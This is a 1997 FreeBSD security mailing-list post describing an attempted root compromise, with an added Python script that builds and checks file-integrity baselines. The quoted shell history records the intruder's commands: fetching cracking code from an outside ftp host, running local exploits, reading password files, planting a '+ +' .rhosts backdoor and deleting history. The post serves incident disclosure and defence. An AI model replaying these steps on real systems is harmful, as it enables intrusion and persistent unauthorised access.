From owner-freebsd-security Fri Jun 20 09:33:38 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA10958 for security-outgoing; Fri, 20 Jun 1997 09:33:38 -0700 (PDT)
Received: from rosemary.fsl.noaa.gov (rosemary.fsl.noaa.gov [137.75.8.41]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA10937 for ; Fri, 20 Jun 1997 09:33:26 -0700 (PDT)
Received: from sage.fsl.noaa.gov (sage.fsl.noaa.gov [137.75.253.42]) by rosemary.fsl.noaa.gov (8.8.5/8.8.5) with SMTP id KAA03730 for ; Fri, 20 Jun 1997 10:33:19 -0600 (MDT)
Message-ID: <33AAB0CA.2781E494@fsl.noaa.gov>
Date: Fri, 20 Jun 1997 10:33:14 -0600
From: Sean Kelly
Organization: CIRA/NOAA
X-Mailer: Mozilla 3.0Gold (X11; I; FreeBSD 2.2-RELEASE i386)
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: Attempt to compromise root
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I'm running FreeBSD 2.2-RELEASE. One of my users (okay, she's my wife) had submitted a crontab which had a bad MAILTO line in it, resulting in a MAILER-DAEMON message being sent to me every time the job was run ... and the job was set to run every minute:

    * * * * * id

When I asked her, she said she didn't know what a crontab file was. That's when I suspected foul play. The wtmp indicated that she had logged in from a remote site early in the morning when I *know* :-) she was asleep.

Then we found the following in her .history file:

--------------------------------------------------------------------
rm *
ftp the.art.of.sekurity.org
more /etc/passwd
ls
cc -o gr1 bsd1.c
rm bsd1.c
rm gr1
cc -o gr1 bsd2.c
chmod 700 gr1
./gr1
./gr1 mary root
rm gr1
ls -al
cc -o gr bsd3.c
chmod 700 gr
./gr
ls
rm bsd2.c
rm bsd3.c
ls
rm gr
cc -o gr bsd4.c
ls -al
./gr
rm bsd4.c
gr
cc -o gr bsd5.c
ls -al
./gr
id
rm gr
rm bsd5
rm bsd5.c
cc -o gr bsd6.c
./gr
rm bsd6.c
rm gr
ls -al
cc -o gr bsd7.c
ls -al
rm bsd7.c
ftp the.art.of.sekurity.org
ls
cc -o jump jump.c
ls -al
./jump
id
./jump
rm *
uname -a
cd /bin
ls -al | more
ls -al | grep wheel
cd ..
ls -al
cd etc
ls -al | more
more security
ls -al mast*
cd /
cat .rhosts
cd
cat .rhosts
ls -al
ls -al | grep drwx
telnet localhost 25
cd /tmp.tmp
cd /tmp/.tmp
ftp the.art.of.sekurity.org
ls -al
cc -o gr bsd1.c
more bsd1.c
rm gr
mv bsd1.c egg.c
cc -s -o /tmp/.tmp/egg -O egg.c
EDITOR='/tmp/.tmp/egg -1259' export EDITOR
EDITOR='/tmp/.tmp/egg -1259' e ; xport EDITOR
EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR
more bsd1.c
ls -al
more egg.c
crontab -e
ls
more egg.c
EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR
bash
whereis bash
/usr/ports/shells/bash
ls -al /usr/ports/shells/bash
/bin/sh
ls -al
rm egg*
pico bsd2.c
more bsd2.c
mv bsd2.c bsd.sh
./bsd.sh
chmod 700 bsd.sh
./bsd.sh
cd /tmp
ls sh*
cd .tmp
ls -al
rm bsd.sh
cp bsd.one bsd.c
vi bsd.c
ls
rm bsd.one
rm bsd.c
ls
cc -o gr bsd3.c
ls
rm bsd3.c
ftp the.art.of.sekurity.org
ls
tar xfv bsd.tar
mv grind.c ohjoy.c sploit ..
cd ..
chmod 700 sploit
chmod 644 *.c
./sploit
id
kill ^1
kill %1
rm ohj*
rm grind*
rm sploit*
ls
rmdir .tmp
cd
ls -al
rm -rf /tmp/.tmp
whereis larn
cd /tmp
mkdir tmp
cd tmp
ftp the.art.of.sekurity.org
ls
cc -o fuck bsd1.c
./fuck
ls
rm fuck
cc -o fuck bsd2.c
./fuck
rm fuck
cc -o fuck bsd3.c
ls
ls /usr/bin/crontab
ls -al /usr/bin/crontab
cc -o fuck bsd4.c
./fuck
./fuck lp1
./fuck bamboo
ls
rm fuck
more bsd1.sh
./bsd1.sh
chmod 700 bsd1.sh
./bsd1.sh
more bsd2.sh
chmod 700 bsd2.
chmod 700 bsd2.*
./bsd2.sh
ls -al
rm *
cd ..
rmdir .tmp
cd
rm -rf /tmp/tmp
cd /etc
cat hosts
cd /home
ls -al
cd rosemary/
ls
ls -al
find . -name .rhosts -print
ypcat passwd
w
cd /etc
more passwd
cd /u
ls -al
pwd
cd ..
ls
ls -al
echo "+ +" >> .rhosts
echo "+ +" > .rhosts
ls -al | more
exit
cd /home
ls
cd rosemary/
ls
ls -al
cd
ls -al | more
rm .history
exit
--------------------------------------------------------------------

Luckily, the idiot didn't realize that the .history file is updated after logout, and we got a record of most of his/her activities.

I've tried ftp'ing to the.art.of.sekurity.org and have been successful only once, but haven't been able to transfer any files. sekurity.org appears registered to an organization called "Insekurity, Inc.".

I checked config files, .rhosts, system binaries, and everything seems intact, so I don't think root was compromised. However, I don't have an md5/mtree digest of everything, so I'm not 100% sure. Next I'll go back to source media and do some comparisons.

So, two issues:

(1) Does this type of attack seem familiar? Is anyone aware of "sekurity.org" and what their purpose is? Is there someone there to whom I should complain? (Doubtful, as it appears the reason that ftp site exists is to provide a repository of cracking code.)

(2) Can we get an option during the FreeBSD install to generate the md5/mtree digest? Naturally, I read up on this feature after the attack, but after an attack it's too late.
--
Sean Kelly
NOAA Forecast Systems Laboratory
Boulder Colorado USA
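The following is an added example, not part of the message above and not FreeBSD's mtree(8). It shows what issue (2) asks for in miniature: record a specification of a file tree at install time (type, mode, owner, size and a SHA-256 digest per file, the same kind of keywords mtree records), save it somewhere the intruder cannot reach, and later compare the live tree against it. The sample tree, its file names and the tampering steps in `demo()` are constructed for the example; the script uses only the Python standard library.

```python
"""mtree-style integrity baseline and verifier (added example, stdlib only).

Usage:  python integrity.py create ROOT SPEC.json
        python integrity.py verify ROOT SPEC.json
Keep SPEC.json on read-only or offline media; a digest the intruder can
rewrite proves nothing.
"""
import hashlib
import json
import os
import stat
import sys
import tempfile
from pathlib import Path

HASH_CHUNK = 1 << 16


def _sha256(path):
    """Stream a file through SHA-256 (md5 was the 1997 choice; it is broken now)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(HASH_CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def describe(path):
    """Attributes for one path; lstat so symlinks are recorded, not followed."""
    st = os.lstat(path)
    if stat.S_ISDIR(st.st_mode):
        kind = "dir"
    elif stat.S_ISLNK(st.st_mode):
        kind = "link"
    elif stat.S_ISREG(st.st_mode):
        kind = "file"
    else:
        kind = "other"
    entry = {"type": kind, "mode": stat.S_IMODE(st.st_mode),
             "uid": st.st_uid, "gid": st.st_gid}
    if kind == "file":           # size is only meaningful for regular files
        entry["size"] = st.st_size
        entry["sha256"] = _sha256(path)
    elif kind == "link":
        entry["link"] = os.readlink(path)
    return entry


def build_spec(root):
    """Walk root (without following symlinked dirs) -> {relative path: attrs}."""
    root = Path(root)
    spec = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        filenames.sort()
        for name in dirnames + filenames:
            full = Path(dirpath) / name
            spec[full.relative_to(root).as_posix()] = describe(full)
    return spec


def verify(root, spec):
    """Compare the live tree with a saved spec: added, removed, changed."""
    current = build_spec(root)
    report = {"added": sorted(set(current) - set(spec)),
              "removed": sorted(set(spec) - set(current)),
              "changed": {}}
    for rel in sorted(set(current) & set(spec)):
        old, new = spec[rel], current[rel]
        diffs = {k: (old.get(k), new.get(k))
                 for k in set(old) | set(new) if old.get(k) != new.get(k)}
        if diffs:
            report["changed"][rel] = diffs
    return report


def demo():
    """Constructed scenario: baseline a fake /bin and home, then tamper with it
    the way the history in the message suggests (trojaned binary of identical
    size, a new setuid bit, a '+ +' .rhosts, a deleted file)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "login").write_bytes(b"LOGIN-v1")
        (root / "bin" / "ls").write_bytes(b"LS-bin")
        (root / "home").mkdir()
        (root / "home" / ".profile").write_text("PATH=/bin\n")
        # Round-trip through JSON exactly as the CLI would store it.
        spec = json.loads(json.dumps(build_spec(root)))
        (root / "bin" / "login").write_bytes(b"LOGIN-v2")   # same size, new content
        os.chmod(root / "bin" / "ls", 0o4755)                # setuid bit added
        (root / "home" / ".rhosts").write_text("+ +\n")      # trust-everyone backdoor
        (root / "home" / ".profile").unlink()
        return verify(root, spec)


if __name__ == "__main__":
    if len(sys.argv) == 4 and sys.argv[1] == "create":
        Path(sys.argv[3]).write_text(json.dumps(build_spec(sys.argv[2]), indent=1))
    elif len(sys.argv) == 4 and sys.argv[1] == "verify":
        saved = json.loads(Path(sys.argv[3]).read_text())
        print(json.dumps(verify(sys.argv[2], saved), indent=1))
    else:
        print(json.dumps(demo(), indent=1))
```

Running the script with no arguments prints the report for the constructed scenario: `bin/login` is flagged on its digest alone (size and mode unchanged), `bin/ls` on its mode, `home/.rhosts` as added and `home/.profile` as removed. The digest is what catches a trojaned binary padded to its original size, which is why a size-and-mtime check is not enough; and the comparison is only as trustworthy as the copy of the spec, so write it at install time and store it off the host.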